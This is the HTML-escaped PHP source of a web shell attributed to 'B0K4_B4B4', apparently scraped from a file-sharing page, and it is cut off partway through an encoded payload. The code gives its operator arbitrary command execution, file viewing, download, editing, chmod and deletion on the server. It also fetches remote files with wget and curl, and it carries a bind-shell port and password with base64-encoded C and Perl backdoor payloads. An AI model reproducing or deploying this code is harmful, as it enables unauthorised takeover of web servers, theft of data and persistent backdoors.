<?php // by B0K4_B4B4 / fb/B0K4_B4B4 set_time_limit(0

advertisement
&lt;?php
// by B0K4_B4B4 / fb/B0K4_B4B4
set_time_limit(0);error_reporting(0);
if(isset($_GET[&quot;dl&quot;]) &amp;&amp; ($_GET[&quot;dl&quot;] != &quot;&quot;)){$file = $_GET[&quot;dl&quot;];$filez
= @file_get_contents($file);header(&quot;Content-type: application/octetstream&quot;);header(&quot;Content-length: &quot;.strlen($filez));header(&quot;Contentdisposition: attachment;filename=&quot;.basename($file).&quot;;&quot;);echo
$filez;exit;}
elseif(isset($_GET[&quot;dlgzip&quot;]) &amp;&amp; ($_GET[&quot;dlgzip&quot;] != &quot;&quot;)){$file =
$_GET['dlgzip'];$filez =
gzencode(@file_get_contents($file));header(&quot;Content-Type:application/xgzip\n&quot;);header(&quot;Content-length: &quot;.strlen($filez));header(&quot;Contentdisposition: attachment;filename=&quot;.basename($file).&quot;.gz;&quot;);echo
$filez;exit;}
if(isset($_GET[&quot;img&quot;])){@ob_clean();$d = magicboom($_GET[&quot;y&quot;]);$f =
$_GET[&quot;img&quot;];$inf = @getimagesize($d.$f);$ext = explode($f,&quot;.&quot;);$ext =
$ext[count($ext)-1];@header(&quot;Content-type:
&quot;.$inf[&quot;mime&quot;]);@header(&quot;Cache-control: public&quot;);@header(&quot;Expires:
&quot;.date(&quot;r&quot;,mktime(0,0,0,1,1,2030)));@header(&quot;Cache-control: maxage=&quot;.(60*60*24*7));@readfile($d.$f);exit;} $software =
getenv(&quot;SERVER_SOFTWARE&quot;);
if (@ini_get(&quot;safe_mode&quot;) or strtolower(@ini_get(&quot;safe_mode&quot;)) == &quot;on&quot;)
$safemode = TRUE;else $safemode = FALSE;$system =
@php_uname();if(strtolower(substr($system,0,3)) == &quot;win&quot;)
$win = TRUE;else $win =
FALSE;if(isset($_GET['y'])){if(@is_dir($_GET['view'])){$pwd =
$_GET['view'];@chdir($pwd);} else{$pwd = $_GET['y'];@chdir($pwd);} }
if(!$win){if(!$user = rapih(exe(&quot;whoami&quot;)))$user = &quot;&quot;;if(!$id =
rapih(exe(&quot;id&quot;))) $id = &quot;&quot;;$prompt = $user.&quot; \$ &quot;;$pwd =
@getcwd().DIRECTORY_SEPARATOR;}
else {$user = @get_current_user();$id = $user;$prompt = $user.&quot;
&amp;gt;&quot;;$pwd = realpath(&quot;.&quot;).&quot;\\&quot;;$v = explode(&quot;\\&quot;,$d);$v = $v[0];foreach
(range(&quot;A&quot;,&quot;Z&quot;) as $letter) {$bool = @is_dir($letter.&quot;:\\&quot;);if
($bool){$letters .= &quot;&lt;a href='?y=&quot;.$letter.&quot;:\\'&gt;[ &quot;;if ($letter.&quot;:&quot; !=
$v){$letters .= $letter;} else {$letters .= &quot;&lt;span
class='gaya'&gt;&quot;.$letter.&quot;&lt;/span&gt;&quot;;} $letters .= &quot; ]&lt;/a&gt; &quot;;}}}
if(function_exists(&quot;posix_getpwuid&quot;) &amp;&amp;
function_exists(&quot;posix_getgrgid&quot;)) $posix = TRUE;
else $posix = FALSE;$server_ip =
@gethostbyname($_SERVER[&quot;HTTP_HOST&quot;]);$my_ip =
$_SERVER['REMOTE_ADDR'];$bindport = &quot;13123&quot;;$bindport_pass =
&quot;B0K4_B4B4&quot;;$pwds = explode(DIRECTORY_SEPARATOR,$pwd);$pwdurl = &quot;&quot;;for($i
= 0 ;$i &lt; sizeof($pwds)-1 ;$i++){$pathz = &quot;&quot;;for($j = 0 ;$j &lt;= $i
;$j++){$pathz .= $pwds[$j].DIRECTORY_SEPARATOR;} $pwdurl .= &quot;&lt;a
href='?y=&quot;.$pathz.&quot;'&gt;&quot;.$pwds[$i].&quot; &quot;.DIRECTORY_SEPARATOR.&quot; &lt;/a&gt;&quot;;}
if(isset($_POST['rename'])){$old = $_POST['oldname'];$new =
$_POST['newname'];@rename($pwd.$old,$pwd.$new);$file = $pwd.$new;}
if(isset($_POST['chmod'])){
$name = $_POST['name'];$value = $_POST['newvalue'];if
(strlen($value)==3){$value = 0 . &quot;&quot; .
$value;}@chmod($pwd.$name,octdec($value));$file = $pwd.$name;}
if(isset($_POST['chmod_folder'])){$name = $_POST['name'];$value =
$_POST['newvalue'];if (strlen($value)==3){$value = 0 . &quot;&quot; .
$value;}@chmod($pwd.$name,octdec($value));$file = $pwd.$name;} $buff =
&quot;&amp;nbsp;&quot;.$software.&quot;&lt;br&gt;&quot;;$buff .= &quot;&amp;nbsp;&quot;.$system.&quot;&lt;br&gt;&quot;;if($id != &quot;&quot;)
$buff .= &quot;&amp;nbsp;&quot;.$id.&quot;&lt;br&gt;&quot;;if($safemode) $buff .= &quot;&amp;nbsp;safemode
:&amp;nbsp;&lt;b&gt;&lt;font style='color:#DD4736'&gt;ON&lt;/font&gt;&lt;/b&gt;&lt;br&gt;&quot;;else $buff .=
&quot;&amp;nbsp;safemode :&amp;nbsp;&lt;b&gt;&lt;font
style='color:#00FF00'&gt;OFF&lt;/font&gt;&lt;/b&gt;&lt;br&gt;&quot;;
function showstat($stat) {if ($stat==&quot;on&quot;) {return &quot;&lt;b&gt;&lt;font
style='color:#00FF00'&gt;ON&lt;/font&gt;&lt;/b&gt;&quot;;}else {return &quot;&lt;b&gt;&lt;font
style='color:#ff0000'&gt;OFF&lt;/font&gt;&lt;/b&gt;&quot;;}}
function testmysql() {if (function_exists('mysql_connect')) {return
showstat(&quot;on&quot;);}else {return showstat(&quot;off&quot;);}}
function testcurl() {if (function_exists('curl_version')) {return
showstat(&quot;on&quot;);}else {return showstat(&quot;off&quot;);}}
function testwget() {if (exe('wget --help')) {return showstat(&quot;on&quot;);}else
{return showstat(&quot;off&quot;);}}
function testperl() {if (exe('perl -h')) {return showstat(&quot;on&quot;);}else
{return showstat(&quot;off&quot;);}}
$buff .= &quot;&amp;nbsp;MySQL: &quot;.testmysql().&quot;&amp;nbsp;|&amp;nbsp;Perl:
&quot;.testperl().&quot;&amp;nbsp;|&amp;nbsp;cURL: &quot;.testcurl().&quot;&amp;nbsp;|&amp;nbsp;WGet:
&quot;.testwget().&quot;&lt;br&gt;&quot;;
$buff .= &quot;&amp;nbsp;&quot;.$letters.&quot;&amp;nbsp;&amp;gt;&amp;nbsp;&quot;.$pwdurl;
function rapih($text){return trim(str_replace(&quot;&lt;br&gt;&quot;,&quot;&quot;,$text));}
function magicboom($text){if (!get_magic_quotes_gpc()){return $text;}
return stripslashes($text);}
function showdir($pwd,$prompt){$fname = array();$dname = array();
if(function_exists(&quot;posix_getpwuid&quot;) &amp;&amp;
function_exists(&quot;posix_getgrgid&quot;))
$posix = TRUE;else $posix = FALSE;$user = &quot;????:????&quot;;
if($dh = opendir($pwd)){while($file = readdir($dh)){
if(is_dir($file)){$dname[] = $file;}
elseif(is_file($file)){$fname[] = $file;}}closedir($dh);}
sort($fname);sort($dname);$path =
@explode(DIRECTORY_SEPARATOR,$pwd);$tree = @sizeof($path);$parent = &quot;&quot;;
$buff = &quot; &lt;form action='?y=&quot;.$pwd.&quot;&amp;amp;x=shell' method='post'
style='margin:8px 0 0 0;'&gt;&lt;table class='cmdbox'
style='width:50%;'&gt;&lt;tr&gt;&lt;td&gt;$prompt&lt;/td&gt;&lt;td&gt;&lt;input
onMouseOver='this.focus();' id='cmd' class='inputz' type='text'
name='cmd' style='width:400px;' value='' /&gt;&lt;input class='inputzbut'
type='submit' value='execute !' name='submitcmd' style='width:80px;'
/&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/form&gt;&lt;form action='?' method='get' style='margin:8px 0 0
0;'&gt;&lt;input type='hidden' name='y' value='&quot;.$pwd.&quot;' /&gt;&lt;tr&gt;&lt;td&gt;view
file/folder&lt;/td&gt;&lt;center&gt;&lt;td&gt;&lt;input onMouseOver='this.focus();' id='goto'
class='inputz' type='text' name='view' style='width:400px;'
value='&quot;.$pwd.&quot;' /&gt;&lt;input class='inputzbut' type='submit' value='view !'
name='submitcmd' style='width:80px;'
/&gt;&lt;/td&gt;&lt;/center&gt;&lt;/tr&gt;&lt;/form&gt;&lt;/table&gt;&lt;table class='explore'&gt;
&lt;tr&gt;&lt;th&gt;name&lt;/th&gt;&lt;th style='width:80px;'&gt;size&lt;/th&gt;&lt;th
style='width:210px;'&gt;owner:group&lt;/th&gt;&lt;th
style='width:80px;'&gt;perms&lt;/th&gt;&lt;th style='width:110px;'&gt;modified&lt;/th&gt;&lt;th
style='width:190px;'&gt;actions&lt;/th&gt;&lt;/tr&gt; &quot;;
if($tree &gt; 2)
for($i=0;$i&lt;$tree-2;$i++) $parent .= $path[$i].DIRECTORY_SEPARATOR;
else $parent = $pwd;
foreach($dname as $folder){
if($folder == &quot;.&quot;) {
if(!$win &amp;&amp;
$posix){$name=@posix_getpwuid(@fileowner($folder));$group=@posix_getgrgid
(@filegroup($folder));$owner = $name['name'].&quot;&lt;span class='gaya'&gt; :
&lt;/span&gt;&quot;.$group['name'];}
else {$owner = $user;}
$buff .= &quot;&lt;tr&gt;&lt;td&gt;&lt;a href=\&quot;?y=&quot;.$pwd.&quot;\&quot;&gt;$folder&lt;/a&gt;&lt;/td&gt;&lt;td&gt;-&lt;/td&gt;
&lt;td style=\&quot;text-align:center;\&quot;&gt;&quot;.$owner.&quot;&lt;/td&gt;
&lt;td&gt;&lt;center&gt;&quot;.get_perms($pwd).&quot;&lt;/center&gt;&lt;/td&gt;
&lt;td style=\&quot;text-align:center;\&quot;&gt;&quot;.date(&quot;d-M-Y
H:i&quot;,@filemtime($pwd)).&quot;&lt;/td&gt;&lt;td&gt;&lt;span id=\&quot;titik1\&quot;&gt;
&lt;a href=\&quot;?y=$pwd&amp;amp;edit=&quot;.$pwd.&quot;newfile.php\&quot;&gt;newfile&lt;/a&gt; | &lt;a
href=\&quot;javascript:tukar('titik1','titik1_form');\&quot;&gt;newfolder&lt;/a&gt;
&lt;/span&gt;&lt;form action=\&quot;?\&quot; method=\&quot;get\&quot; id=\&quot;titik1_form\&quot;
class=\&quot;sembunyi\&quot; style=\&quot;margin:0;padding:0;\&quot;&gt;
&lt;input type=\&quot;hidden\&quot; name=\&quot;y\&quot; value=\&quot;&quot;.$pwd.&quot;\&quot; /&gt;
&lt;input class=\&quot;inputz\&quot; style=\&quot;width:140px;\&quot; type=\&quot;text\&quot;
name=\&quot;mkdir\&quot; value=\&quot;a_new_folder\&quot; /&gt;
&lt;input class=\&quot;inputzbut\&quot; type=\&quot;submit\&quot; name=\&quot;rename\&quot;
style=\&quot;width:35px;\&quot; value=\&quot;Go\&quot; /&gt;
&lt;/form&gt;&lt;/td&gt;&lt;/tr&gt; &quot;;}
elseif($folder == &quot;..&quot;){
if(!$win &amp;&amp; $posix)
{$name=@posix_getpwuid(@fileowner($folder));$group=@posix_getgrgid(@fileg
roup($folder));
$owner = $name['name'].&quot;&lt;span class=\&quot;gaya\&quot;&gt; : &lt;/span&gt;&quot;.$group['name'];}
else { $owner = $user; }
$buff .= &quot;&lt;tr&gt;&lt;td&gt;
&lt;a href=\&quot;?y=&quot;.$parent.&quot;\&quot;&gt;&lt;img
src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAA
AAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAAN1gAADdYBkG95nAAAAAd
0SU1FB9oJBxUAM0qLz6wAAALLSURBVDjLbVPRS1NRGP+d3btrs7kZmAYXlSZYUK4HQXCREPWU
QSSYID1GEKKx/Af25lM+DCFCe4heygcNdIUEST04QW6BjS0yx5UhkW6FEtvOPfc7p4emXcofH
Pg453y/73e+73cADyzLOoy/bHzR8/l80LbtYD5v6wf72VzOmwLmTe7u7oZlWccbGhpGNJ92HQ
wtteNvSqmXJOWjM52dPPMpg/Nd5/8SpFIp9Pf3w7KsS4FA4BljrB1HQCmVc4V7O3oh+mFlZQW
xWAwskUggkUhgeXk5Fg6HF5mPnWCAAhhTUGCKQUF5eb4LIa729PRknr94/kfBwMDAsXg8/tHv
958FoDxP88YeJTLd2xuLAYAPAIaGhu5IKc9yzsE5Z47jYHV19UOpVNoXQsC7OOdwHNG7tLR0E
wD0UCis67p2nXMOACiXK7/ev3/3ZHJy8nEymZwyDMM8qExEyjTN9vr6+oAQ4gaAef3ixVgd58
4pw+DY3d0tTE9Pj6TT6TfBYJCPj4/fBuA/IBBC+GZmZhZbWlrOOY5jDg8Pa3qpVEKlUoHf70c
gEGgeHR2NPHgQV4ODt9Ts7KwEQACgaRpSqVdQSrFqtYpqtSpt2wYDYExMTMy3tbVdk1LWpqXe
bm1t3TdN86mu65FaMw+sE2KM6T9//pgaGxsb1QE4a2trr5uamq55Gn2l+WRzWgihEVH9EX5AJ
pOZBwANAHK5XKGjo6OvsbHRdF0XRAQpZZ2U0k9EiogYEYGIlJSS2bY9m0wmHwJQWo301/b2di
ESiVw2jLoQETFyXeWSy4hc5rqHJKxYLGbn5ubuFovF0qECANjf37e/bmzkjDrjdCgUamU+MCI
JIgkpiZXLZZnNZhcWFhbubW5ufu7q6sLOzs7/LgPQ3tra2h+NRvvC4fApAHJvb29rfX19qVAo
vAawd+Rv/Ac+AMcAGLUJVAA4R138DeF+cX+xR/AGAAAAAElFTkSuQmCC'&gt;&lt;/a&gt;&lt;/td&gt;&lt;td&gt;&lt;/td&gt;
&lt;td style=\&quot;text-align:center;\&quot;&gt;&quot;.$owner.&quot;&lt;/td&gt;
&lt;td&gt;&lt;center&gt;&quot;.get_perms($parent).&quot;&lt;/center&gt;&lt;/td&gt; &lt;td style=\&quot;textalign:center;\&quot;&gt;&quot;.date(&quot;d-M-Y H:i&quot;,@filemtime($parent)).&quot;&lt;/td&gt;
&lt;td&gt;&lt;span id=\&quot;titik2\&quot;&gt;&lt;a
href=\&quot;?y=$pwd&amp;amp;edit=&quot;.$parent.&quot;newfile.php\&quot;&gt;newfile&lt;/a&gt; | &lt;a
href=\&quot;javascript:tukar('titik2','titik2_form');\&quot;&gt;newfolder&lt;/a&gt;&lt;/span&gt;
&lt;form action=\&quot;?\&quot; method=\&quot;get\&quot; id=\&quot;titik2_form\&quot; class=\&quot;sembunyi\&quot;
style=\&quot;margin:0;padding:0;\&quot;&gt;
&lt;input type=\&quot;hidden\&quot; name=\&quot;y\&quot; value=\&quot;&quot;.$pwd.&quot;\&quot; /&gt;
&lt;input class=\&quot;inputz\&quot; style=\&quot;width:140px;\&quot; type=\&quot;text\&quot;
name=\&quot;mkdir\&quot; value=\&quot;a_new_folder\&quot; /&gt;
&lt;input class=\&quot;inputzbut\&quot; type=\&quot;submit\&quot; name=\&quot;rename\&quot;
style=\&quot;width:35px;\&quot; value=\&quot;Go\&quot; /&gt;
&lt;/form&gt;&lt;/td&gt;&lt;/tr&gt;&quot;;}else{if(!$win &amp;&amp; $posix){
$name=@posix_getpwuid(@fileowner($folder));
$group=@posix_getgrgid(@filegroup($folder));
$owner = $name['name'].&quot;&lt;span class=\&quot;gaya\&quot;&gt; : &lt;/span&gt;&quot;.$group['name'];}
else { $owner = $user; }
$buff .= &quot;&lt;tr&gt;&lt;td&gt;&lt;a id=\&quot;&quot;.clearspace($folder).&quot;_link\&quot;
href=\&quot;?y=&quot;.$pwd.$folder.DIRECTORY_SEPARATOR.&quot;\&quot;&gt;&lt;img
src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAQAAAC1+jfqAA
AAAXNSR0IArs4c6QAAAAJiS0dEAP+Hj8y/AAAACXBIWXMAAAsTAAALEwEAmpwYAAAA00lEQVQ
oz6WRvUpDURCEvzmuwR8s8gr2ETvtLSRaKj6ArZU+VVAEwSqvJIhIwiX33nPO2IgayK2cbtmZ
WT4W/iv9HeacA697NQRY281Fr0du1hJPt90D+xgc6fnwXjC79JWyQdiTfOrf4nk/jZf0cVenI
pEQImGjQsVod2cryvH4TEZC30kLjME+KUdRl24ZDQBkryIvtOJggLGri+hbdXgd90e9++hz6r
R5jYtzZKsIDzhwFDTQDzZEsTz8CRO5pmVqB240ucRbM7kejTcalBfvn195EV+EajF1hgAAAAB
JRU5ErkJggg==' /&gt; $folder&lt;/a&gt;
&lt;form action=\&quot;?y=$pwd\&quot; method=\&quot;post\&quot;
id=\&quot;&quot;.clearspace($folder).&quot;_form\&quot; class=\&quot;sembunyi\&quot;
style=\&quot;margin:0;padding:0;\&quot;&gt;
&lt;input type=\&quot;hidden\&quot; name=\&quot;oldname\&quot; value=\&quot;&quot;.$folder.&quot;\&quot;
style=\&quot;margin:0;padding:0;\&quot; /&gt;
&lt;input class=\&quot;inputz\&quot; style=\&quot;width:200px;\&quot; type=\&quot;text\&quot;
name=\&quot;newname\&quot; value=\&quot;&quot;.$folder.&quot;\&quot; /&gt;
&lt;input class=\&quot;inputzbut\&quot; type=\&quot;submit\&quot; name=\&quot;rename\&quot;
value=\&quot;rename\&quot; /&gt;
&lt;input class=\&quot;inputzbut\&quot; type=\&quot;submit\&quot; name=\&quot;cancel\&quot;
value=\&quot;cancel\&quot;
onclick=\&quot;tukar('&quot;.clearspace($folder).&quot;_form','&quot;.clearspace($folder).&quot;_l
ink');\&quot; /&gt;
&lt;/form&gt; &lt;/td&gt;&lt;td&gt;DIR&lt;/td&gt;&lt;td style=\&quot;textalign:center;\&quot;&gt;&quot;.$owner.&quot;&lt;/td&gt;&lt;td&gt;&lt;center&gt;
&lt;a
href=\&quot;javascript:tukar('&quot;.clearspace($folder).&quot;_link','&quot;.clearspace($fol
der).&quot;_form3');\&quot;&gt;&quot;.get_perms($pwd.$folder).&quot;&lt;/a&gt;
&lt;form action=\&quot;?y=$pwd\&quot; method=\&quot;post\&quot;
id=\&quot;&quot;.clearspace($folder).&quot;_form3\&quot; class=\&quot;sembunyi\&quot;
style=\&quot;margin:0;padding:0;\&quot;&gt;
&lt;input type=\&quot;hidden\&quot; name=\&quot;name\&quot; value=\&quot;&quot;.$folder.&quot;\&quot;
style=\&quot;margin:0;padding:0;\&quot; /&gt;
&lt;input class=\&quot;inputz\&quot; style=\&quot;width:200px;\&quot; type=\&quot;text\&quot;
name=\&quot;newvalue\&quot; value=\&quot;&quot;.substr(sprintf('%o',
fileperms($pwd.$folder)), -4).&quot;\&quot; /&gt;
&lt;input class=\&quot;inputzbut\&quot; type=\&quot;submit\&quot; name=\&quot;chmod_folder\&quot;
value=\&quot;chmod\&quot; /&gt;
&lt;input class=\&quot;inputzbut\&quot; type=\&quot;submit\&quot; name=\&quot;cancel\&quot;
value=\&quot;cancel\&quot;
onclick=\&quot;tukar('&quot;.clearspace($folder).&quot;_link','&quot;.clearspace($folder).&quot;_f
orm3');\&quot; /&gt;&lt;/form&gt;&lt;/center&gt;&lt;/td&gt;&lt;td style=\&quot;textalign:center;\&quot;&gt;&quot;.date(&quot;d-M-Y H:i&quot;,@filemtime($folder)).&quot;&lt;/td&gt;&lt;td&gt;&lt;a
href=\&quot;javascript:tukar('&quot;.clearspace($folder).&quot;_link','&quot;.clearspace($fol
der).&quot;_form');\&quot;&gt;rename&lt;/a&gt;| &lt;a
href=\&quot;?y=$pwd&amp;amp;fdelete=&quot;.$pwd.$folder.&quot;\&quot;&gt;delete&lt;/a&gt;
&lt;/td&gt;
&lt;/tr&gt;&quot;;}}
foreach($fname as $file){
$full = $pwd.$file;
if(!$win &amp;&amp; $posix){$name=@posix_getpwuid(@fileowner($file));
$group=@posix_getgrgid(@filegroup($file)); $owner = $name['name'].&quot;&lt;span
class=\&quot;gaya\&quot;&gt; : &lt;/span&gt;&quot;.$group['name'];}
else { $owner = $user; }
$buff .= &quot;&lt;tr&gt;&lt;td&gt;&lt;a id=\&quot;&quot;.clearspace($file).&quot;_link\&quot;
href=\&quot;?y=$pwd&amp;amp;view=$full\&quot;&gt;&lt;img
src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAA
AAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd
0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwG
jiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4
eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7Mx
qNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHr
rPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSj
rErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCs
ZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0
rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8Z
kUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4OD
z8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2
toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpCl
hpBvgPeloL9U55NIAAAAAASUVORK5CYII=' /&gt; $file&lt;/a&gt;
&lt;form action=\&quot;?y=$pwd\&quot; method=\&quot;post\&quot;
id=\&quot;&quot;.clearspace($file).&quot;_form\&quot; class=\&quot;sembunyi\&quot;
style=\&quot;margin:0;padding:0;\&quot;&gt;
&lt;input type=\&quot;hidden\&quot; name=\&quot;oldname\&quot; value=\&quot;&quot;.$file.&quot;\&quot;
style=\&quot;margin:0;padding:0;\&quot; /&gt;&lt;input class=\&quot;inputz\&quot;
style=\&quot;width:200px;\&quot; type=\&quot;text\&quot; name=\&quot;newname\&quot; value=\&quot;&quot;.$file.&quot;\&quot;
/&gt;&lt;input class=\&quot;inputzbut\&quot; type=\&quot;submit\&quot; name=\&quot;rename\&quot;
value=\&quot;rename\&quot; /&gt;&lt;input class=\&quot;inputzbut\&quot; type=\&quot;submit\&quot;
name=\&quot;cancel\&quot; value=\&quot;cancel\&quot;
onclick=\&quot;tukar('&quot;.clearspace($file).&quot;_link','&quot;.clearspace($file).&quot;_form'
);\&quot; /&gt;
&lt;/form&gt;&lt;/td&gt;&lt;td&gt;&quot;.ukuran($full).&quot;&lt;/td&gt;&lt;td style=\&quot;textalign:center;\&quot;&gt;&quot;.$owner.&quot;&lt;/td&gt;&lt;td&gt;&lt;center&gt;
&lt;a
href=\&quot;javascript:tukar('&quot;.clearspace($file).&quot;_link','&quot;.clearspace($file)
.&quot;_form2');\&quot;&gt;&quot;.get_perms($full).&quot;&lt;/a&gt;
&lt;form action=\&quot;?y=$pwd\&quot; method=\&quot;post\&quot;
id=\&quot;&quot;.clearspace($file).&quot;_form2\&quot; class=\&quot;sembunyi\&quot;
style=\&quot;margin:0;padding:0;\&quot;&gt;
&lt;input type=\&quot;hidden\&quot; name=\&quot;name\&quot; value=\&quot;&quot;.$file.&quot;\&quot;
style=\&quot;margin:0;padding:0;\&quot; /&gt;
&lt;input class=\&quot;inputz\&quot; style=\&quot;width:200px;\&quot; type=\&quot;text\&quot;
name=\&quot;newvalue\&quot; value=\&quot;&quot;.substr(sprintf('%o', fileperms($full)), 4).&quot;\&quot; /&gt;
&lt;input class=\&quot;inputzbut\&quot; type=\&quot;submit\&quot; name=\&quot;chmod\&quot; value=\&quot;chmod\&quot;
/&gt;
&lt;input class=\&quot;inputzbut\&quot; type=\&quot;submit\&quot; name=\&quot;cancel\&quot;
value=\&quot;cancel\&quot;
onclick=\&quot;tukar('&quot;.clearspace($file).&quot;_link','&quot;.clearspace($file).&quot;_form2
');\&quot; /&gt;&lt;/form&gt;&lt;/center&gt;&lt;/td&gt;
&lt;td style=\&quot;text-align:center;\&quot;&gt;&quot;.date(&quot;d-M-Y
H:i&quot;,@filemtime($full)).&quot;&lt;/td&gt;
&lt;td&gt;&lt;a href=\&quot;?y=$pwd&amp;amp;edit=$full\&quot;&gt;edit&lt;/a&gt; | &lt;a
href=\&quot;javascript:tukar('&quot;.clearspace($file).&quot;_link','&quot;.clearspace($file)
.&quot;_form');\&quot;&gt;rename&lt;/a&gt;| &lt;a href=\&quot;?y=$pwd&amp;amp;delete=$full\&quot;&gt;delete&lt;/a&gt;
| &lt;a href=\&quot;?y=$pwd&amp;amp;dl=$full\&quot;&gt;download&lt;/a&gt;&amp;nbsp;(&lt;a
href=\&quot;?y=$pwd&amp;amp;dlgzip=$full\&quot;&gt;gz&lt;/a&gt;)
&lt;/td&gt;&lt;/tr&gt;&quot;;}
$buff .= &quot;&lt;/table&gt;&quot;; return $buff;}
function ukuran($file){if($size = @filesize($file)){if($size &lt;= 1024)
return $size;else{if($size &lt;= 1024*1024) {$size = @round($size /
1024,2);;
return &quot;$size kb&quot;;} else {$size = @round($size / 1024 / 1024,2);return
&quot;$size mb&quot;;}}}
else return &quot;???&quot;;} function exe($cmd){if(function_exists('system'))
{@ob_start();@system($cmd);$buff = @ob_get_contents();$buff =
@ob_get_contents();@ob_end_clean();
return $buff;} elseif(function_exists('exec'))
{@exec($cmd,$results);$buff = &quot;&quot;;foreach($results as $result){$buff .=
$result;} return $buff;}
elseif(function_exists('passthru')){@ob_start();@passthru($cmd);$buff =
@ob_get_contents();@ob_end_clean();return $buff;}
elseif(function_exists('shell_exec')){$buff = @shell_exec($cmd);return
$buff;}} function tulis($file,$text){$textz =
gzinflate(base64_decode($text));if($filez = @fopen($file,&quot;w&quot;))
{@fputs($filez,$textz);@fclose($file);}}
function ambil($link,$file) {if($fp =
@fopen($link,&quot;r&quot;)){while(!feof($fp)){$cont.=
@fread($fp,1024);}@fclose($fp);$fp2 =
@fopen($file,&quot;w&quot;);@fwrite($fp2,$cont);@fclose($fp2);} }
function which($pr){$path = exe(&quot;which $pr&quot;);
if(!empty($path)) {return trim($path);}
else {return trim($pr);}}
function download($cmd,$url){$namafile = basename($url);
switch($cmd){case 'wwget': exe(which('wget').&quot; &quot;.$url.&quot; -O
&quot;.$namafile);break;case 'wlynx': exe(which('lynx').&quot; -source &quot;.$url.&quot; &gt;
&quot;.$namafile);break;case 'wfread' : ambil($wurl,$namafile);break;case
'wfetch' : exe(which('fetch').&quot; -o &quot;.$namafile.&quot; -p &quot;.$url);break;case
'wlinks' : exe(which('links').&quot; -source &quot;.$url.&quot; &gt;
&quot;.$namafile);break;case 'wget' : exe(which('GET').&quot; &quot;.$url.&quot; &gt;
&quot;.$namafile);break;case 'wcurl' : exe(which('curl').&quot; &quot;.$url.&quot; -o
&quot;.$namafile);break;default: break;}
return $namafile;}function get_perms($file)
{if($mode=@fileperms($file)){$perms='';$perms .= ($mode &amp; 00400) ? 'r' :
'-';$perms .= ($mode &amp; 00200) ? 'w' : '-';$perms .= ($mode &amp; 00100) ? 'x'
: '-';$perms .= ($mode &amp; 00040) ? 'r' : '-';$perms .= ($mode &amp; 00020) ?
'w' : '-';$perms .= ($mode &amp; 00010) ? 'x' : '-';$perms .= ($mode &amp; 00004)
? 'r' : '-';$perms .= ($mode &amp; 00002) ? 'w' : '-';$perms .= ($mode &amp;
00001) ? 'x' : '-';
return $perms;}else return &quot;??????????&quot;;}function
clearspace($text){return str_replace(&quot;
&quot;,&quot;_&quot;,$text);}$port_bind_bd_c=&quot;bVNhb9owEP2OxH+4phI4NINAN00aYxJaW6maxqbSLx
NDKDiXxiLYkW3KGOp/3zlOpo7xIY793jvf
+fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa+pRCWtgmQ
rJE
P/GIhufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB4
1ZZ
dKTIWKb0hoUwmUAcwtFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE
6VL
3TfVrw4o2P1senPzsJrOfoRjl9cfhWjvIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQV
Kug
Uq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ7oOgKMbvNeThHMsbSOO69IA0l05Y
pXk
HDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07AWiAzYBc9LivU3MVpGFV2x1
J4W
tyxAnivYY8HVFsEqWF+/f7sBk2NRQKcDA/JtsE5MDm9EUG+MhcFqkpX0HmxGbqbkdBTMldaHR
sUL
ZeoDeOSFBvpefCfXhflOpgTkvJ+jtKiR7vLohYKCqS2ZmMRj4Z5gQZfSiMbi6iqkdnHarEEXY
uk6
uPtTdumsr0HC4q5rrzNifV7sC3ZWUmq+LVlVa5OfQjTanZYQO+Uf&quot;;$port_bind_bd_pl=&quot;Z
ZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvW
r1
NmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXz
fwg
tNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPE
QkD
e/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5scfTaWAOVE9pM5WMo
uM0
